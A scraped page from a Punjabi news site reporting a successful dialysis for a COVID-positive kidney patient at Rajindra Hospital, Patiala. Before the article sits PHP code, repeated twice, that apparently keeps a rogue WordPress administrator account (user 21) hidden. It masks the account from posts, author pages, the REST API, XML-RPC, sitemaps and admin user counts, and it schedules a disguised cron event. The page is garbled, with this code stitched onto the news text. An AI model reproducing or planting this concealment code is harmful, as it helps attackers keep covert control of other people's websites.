add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਪਟਿਆਲਾ ਦੀ ਕੋਵਿਡ ਆਈ.ਸੀ.ਯੂ. 'ਚ ਗੁਰਦਾ ਪੀੜਤ ਕੋਰੋਨਾ ਮਰੀਜ ਦਾ ਡਾਇਲਸਿਸ ਸਫ਼ਲ - Press Ki Taquat
No Result
View All Result
ਪਟਿਆਲਾ, 12 ਜੁਲਾਈ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ) : ਪਟਿਆਲਾ ਦੇ ਸਰਕਾਰੀ ਰਜਿੰਦਰਾ ਹਸਪਤਾਲ ਵਿਖੇ ਕੋਵਿਡ-19 ਪਾਜਿਟਿਵ ਮਰੀਜਾਂ ਦੇ ਇਲਾਜ ਲਈ ਸਥਾਪਤ ਕੋਰੋਨਾ ਬਲਾਕ ਦੀ ਕੋਵਿਡ ਆਈ.ਸੀ.ਯੂ. ‘ਚ ਹਸਪਤਾਲ ਦੇ ਡਾਕਟਰਾਂ ਨੇ ਅੱਜ ਇੱਕ ਗੁਰਦਾ ਰੋਗ ਤੋਂ ਪੀੜਤ ਅਤੇ ਕੋਰੋਨਾ ਪਾਜਿਟਿਵ 57 ਸਾਲਾ ਮਹਿਲਾ ਮਰੀਜ ਦਾ ਸਫ਼ਲਤਾ ਪੂਰਵਕ ਡਾਇਲਸਿਸ ਕੀਤਾ।
ਸਰਕਾਰੀ ਰਜਿੰਦਰਾ ਹਸਪਤਾਲ ਦੇ ਮੈਡੀਕਲ ਸੁਪਰਡੈਂਟ ਡਾ. ਪਾਰਸ ਪਾਂਡਵ ਨੇ ਇਸ ਬਾਰੇ ਜਾਣਕਾਰੀ ਦਿੰਦਿਆਂ ਦੱਸਿਆ ਕਿ ਰਜਿੰਦਰਾ ਹਸਪਤਾਲ ਦੇ ਆਈਸੋਲੇਸ਼ਨ ਫੈਸਲਿਟੀ ਟੀਮਾਂ ਦੇ ਇੰਚਾਰਜ ਅਤੇ ਮੈਂਬਰ ਡਾਕਟਰਾਂ ਸਮੇਤ ਪੈਰਾ ਮੈਡੀਕਲ ਅਮਲਾ ਤੇ ਹੈਲਥ ਵਰਕਰਜ ਪੰਜਾਬ ਦੇ ਮੁੱਖ ਮੰਤਰੀ ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਵੱਲੋਂ ਕੋਵਿਡ-19 ਨੂੰ ਹਰਾਉਣ ਲਈ ਅਰੰਭੀ ਜੰਗ ‘ਮਿਸ਼ਨ ਫ਼ਤਿਹ’ ਦੀ ਸਫ਼ਲਤਾ ਲਈ 24 ਘੰਟੇ ਅਤੇ ਸੱਤੇ ਦਿਨ ਤਤਪਰ ਹਨ। ਉਨ੍ਹਾਂ ਦੱਸਿਆ ਕਿ ਕੋਵਿਡ ਵਾਰਡ ‘ਚ ਹੁਣ ਤੱਕ 356 ਮਰੀਜ ਦਾਖਲ ਹੋਏ ਜਿਨ੍ਹਾਂ ‘ਚੋਂ 250 ਮਰੀਜ ਠੀਕ ਹੋ ਕੇ ਆਪਣੇ ਘਰਾਂ ਨੂੰ ਜਾ ਚੁੱਕੇ ਹਨ ਜਦੋਂ ਕਿ ਇਸ ਸਮੇਂ ਇੱਥੇ 88 ਮਰੀਜ ਇਲਾਜ ਅਧੀਨ ਹਨ।
ਡਾ. ਪਾਂਡਵ ਨੇ ਦੱਸਿਆ ਕਿ 57 ਸਾਲਾ ਮਹਿਲਾ ਮਰੀਜ ਪਹਿਲਾਂ ਬੱਚੇਦਾਨੀ ਦੇ ਕੈਂਸਰ ਤੋਂ ਪੀੜਤ ਸੀ ਅਤੇ ਬਾਅਦ ‘ਚ ਗੁਰਦੇ ਰੋਗ ਤੋਂ ਪੀੜਤ ਹੋਣ ਕਰਕੇ ਹਫ਼ਤੇ ‘ਚ ਦੋ ਵਾਰ ਲਗਾਤਾਰ ਡਾਇਲਸਿਸ ਕਰਵਾ ਰਹੀ ਸੀੇ। 11 ਜੁਲਾਈ ਨੂੰ ਇਹ ਮਹਿਲਾ ਕੋਵਿਡ ਪਾਜਿਟਿਵ ਪਾਈ ਗਈ ਅਤੇ ਇਸ ਨੂੰ ਗੰਭੀਰ ਹਾਲਤ ‘ਚ ਸਰਕਾਰੀ ਰਜਿੰਦਰਾ ਹਸਪਤਾਲ ਵਿਖੇ ਇਲਾਜ ਲਈ ਰੈਫ਼ਰ ਕੀਤਾ ਗਿਆ।
ਮੈਡੀਕਲ ਸੁਪਰਡੈਂਟ ਨੇ ਦੱਸਿਆ ਕਿ ਕੋਵਿਡ ਆਈਸੋਲੇਸ਼ਨ ਵਾਰਡ ਵਿਖੇ ਗੰਭੀਰ ਹਾਲਤ ‘ਚ ਲਿਆਂਦੀ ਗਈ ਸੰਗਰੂਰ ਜ਼ਿਲ੍ਹੇ ਦੀ ਇਸ ਮਹਿਲਾ ਮਰੀਜ ਨੂੰ ਡਾਕਟਰਾਂ ਨੇ ਇਸਦੀ ਹਾਲਤ ਦੇਖਦਿਆਂ ਤੁਰੰਤ ਆਕਸੀਜਨ ਲਗਾਈ ਅਤੇ ਦਵਾਈਆਂ ਦੇ ਕੇ ਸਥਿਰ ਕੀਤਾ। ਇਸੇ ਦੌਰਾਨ ਆਈਸੋਲੇਸ਼ਨ ਦੀਆਂ ਡਾਇਲਸਿਸ ਟੀਮਾਂ ਨੂੰ ਤਿਆਰ ਕੀਤਾ ਗਿਆ ਅਤੇ ਮਰੀਜ ਦੀ ਹਾਲਤ ਵੇਖਦੇ ਹੋਏ ਅੱਜ ਸਵੇਰੇ ਤੁਰੰਤ ਇਸਦਾ ਡਾਇਲਸਿਸ ਅਰੰਭ ਕੀਤਾ ਗਿਆ। ਸੀਨੀਅਰ ਡਾਕਟਰਾਂ ਦੀ ਨਿਗਰਾਨੀ ਹੇਠ ਇਸ ਕੰਮ ਨੂੰ ਸਫ਼ਲਤਾ ਪੂਰਵਕ ਨੇਪਰੇ ਚੜ੍ਹਾਇਆ ਗਿਆ। ਉਨ੍ਹਾਂ ਦੱਸਿਆ ਕਿ ਅਜਿਹੇ ਮਰੀਜਾਂ ਲਈ ਕੋਵਿਡ-19 ਦਾ ਪਾਜਿਟਿਵ ਹੋਣਾ ਬਹੁਤ ਗੰਭੀਰ ਮੰਨਿਆਂ ਜਾਂਦਾ ਹੈ ਪਰੰਤੂ ਡਾਕਟਰਾਂ ਦੀ ਮਿਹਨਤ ਸਦਕਾ ਮਰੀਜ ਦੀ ਜਾਨ ਬਚ ਗਈ।
ਡਾ. ਪਾਰਸ ਪਾਂਡਵ ਨੇ ਦੱਸਿਆ ਕਿ ਮੁੱਖ ਮੰਤਰੀ ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਦੇ ਦਿਸ਼ਾ ਨਿਰਦੇਸ਼ਾਂ ਹੇਠ ਮੈਡੀਕਲ ਸਿੱਖਿਆ ਅਤੇ ਖੋਜ ਵਿਭਾਗ ਦੇ ਮੰਤਰੀ ਸ੍ਰੀ ਓ.ਪੀ. ਸੋਨੀ ਦੀ ਦੇਖ-ਰੇਖ ਹੇਠ ਪ੍ਰਮੁੱਖ ਸਕੱਤਰ ਸ੍ਰੀ ਡੀ.ਕੇ. ਤਿਵਾੜੀ, ਡਾਇਰੈਕਟਰ ਡਾ. ਅਬਨੀਸ਼ ਕੁਮਾਰ ਅਤੇ ਮੈਡੀਕਲ ਕਾਲਜ ਦੇ ਪ੍ਰਿੰਸੀਪਲ ਡਾ. ਹਰਜਿੰਦਰ ਸਿੰਘ ਰਜਿੰਦਰਾ ਹਸਪਤਾਲ ਦੀ ਆਈਸੋਲੇਸ਼ਨ ਵਾਰਡ ਦੀ ਕਾਰਗੁਜ਼ਾਰੀ ਦਾ ਨਿਯਮਤ ਤੌਰ ‘ਤੇ ਜਾਇਜ਼ਾ ਲੈਂਦੇ ਰਹਿੰਦੇ ਹਨ।
Post Views: 99
No Result
View All Result